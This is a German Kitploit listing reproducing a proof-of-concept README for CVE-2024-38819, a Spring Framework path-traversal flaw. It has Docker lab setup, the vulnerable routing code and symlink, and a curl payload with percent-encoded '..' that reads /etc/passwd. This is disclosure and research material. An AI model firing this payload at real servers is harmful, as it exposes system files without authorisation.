Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/masa42/cve-2024-38819-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmasa42/cve-2024-38819-poc

CVE-2024-38819-POC

Repository anzeigen
3915vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-38819: Proof of Concept (PoC)

Dies ist ein Proof of Concept für die von mir gemeldete Schwachstelle CVE-2024-38819, die einen Path-Traversal-Exploit demonstriert.

Ausführungsschritte

  1. Baue das Docker-Image (Spring Boot 3.3.4, basierend auf Spring Framework 6.1.13)

    root@kitploit:~
    cd vuln
    docker build -t cve-2024-38819-poc .
    
  2. Starte den Container und gib Port 8080 an die Host-Maschine weiter

    root@kitploit:~
    docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
    
  3. Führe den folgenden Befehl aus, um den PoC auszuführen und die Schwachstelle zu bestätigen

    root@kitploit:~
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    Wenn der Angriff erfolgreich ist, wird der Inhalt der Datei /etc/passwd angezeigt.

Erläuterung

  1. Erstelle PathTraversalDemoApplication.java mit dem folgenden Code, um das statische Datei-Routing mit RouterFunction und FileSystemResource einzurichten:

    root@kitploit:~
    public RouterFunction<ServerResponse> staticResourceRouter() {
        return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }
    
  2. Füge dem Dockerfile den folgenden Befehl hinzu, um einen symbolischen Link zu erstellen:

    root@kitploit:~
    RUN ln -s /static /app/static/link
    
  3. Erstelle ein Payload, das Percent-Encoding nutzt, um Verzeichnisse über den symbolischen Link zu durchlaufen.

    • Pfad: /static/link/%2e%2e/etc/passwd
  4. Verwende den folgenden curl-Befehl, um den PoC auszuführen und zu überprüfen, ob der Angriff erfolgreich ist:

    root@kitploit:~
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    Wenn der Angriff erfolgreich ist, wird der Inhalt der Datei /etc/passwd angezeigt.

Haftungsausschluss

Dieser PoC wird zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Bevor du ihn in einem realen System einsetzt, stelle sicher, dass die Schwachstelle behoben wurde und du über die entsprechende Genehmigung verfügst. Der Autor übernimmt keinerlei Verantwortung für eine missbräuchliche Verwendung dieses Codes.

Tool herunterladen